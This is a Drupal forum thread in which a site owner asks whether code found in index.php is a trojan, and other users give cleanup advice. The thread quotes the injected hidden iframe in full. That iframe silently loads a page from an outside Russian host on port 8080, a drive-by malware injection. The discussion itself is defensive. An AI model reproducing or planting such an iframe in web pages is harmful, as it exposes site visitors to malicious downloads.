By korsansozluk on

hi
my drupal on my site I see a code like this in index.php
Do you wonder if this is a trojan. Do we have a chance to eat trojan?

<iframe frameborder="0" onload="if (!this.src){ this.height='0'; this.src='http://worldcardtech.ru:8080/index.php'; this.width='0';}" >1258371361co3</iframe>

my drupal site:
www.sinemaa.com
www.korsansozluk.com

Categories: Drupal 6.x

Comments

vm’s picture

vm commented

remove the code, change all passwords with rehards to FTP and sever side stuff including MySQL.

check file permissions on index.php.

As far as I can tell, these types of issues are because of lax security on the server more so then an issue with drupal.

Personally, I'd remove all files and folders and upload where it concerns core and upload all new files and folders. I'd also check my logs against the date of the file to see if it provides any clues into how it was written to or when.

korsansozluk’s picture

korsansozluk commented

thanks VeryMisunderstood

from what I did.

WeWatchYourWebsite’s picture

WeWatchYourWebsite commented

This is a known malscript and it usually starts by using stolen FTP credentials.

I blogged about it here: http://www.wewatchyourwebsite.com/wordpress/?p=278

If you don't find the remote control code, your site will be attacked repeatedly.

Let me know if you need help cleaning this.